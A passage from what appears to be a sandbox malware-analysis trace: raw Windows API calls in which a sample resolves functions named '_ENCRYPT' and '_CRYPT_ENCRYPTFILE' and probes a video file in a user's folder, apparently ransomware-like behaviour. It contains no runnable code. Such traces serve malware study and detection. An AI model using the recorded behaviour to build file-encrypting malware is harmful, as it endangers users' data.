dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0193.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0193.636] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.636] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.636] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.637] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0193.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0193.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0193.637] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.637] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0193.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0193.637] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0193.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0193.637] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0193.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0193.638] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0193.638] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0193.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0193.639] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.639] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0x90add8 [0193.639] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.640] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0193.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0x90add8 [0193.640] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0193.640] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0193.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ffd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fd495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="495B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eqP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qP\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iatAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tAIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIn2v.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.643] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0193.643] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0193.643] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.643] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.643] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0193.644] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0193.644] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0193.644] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 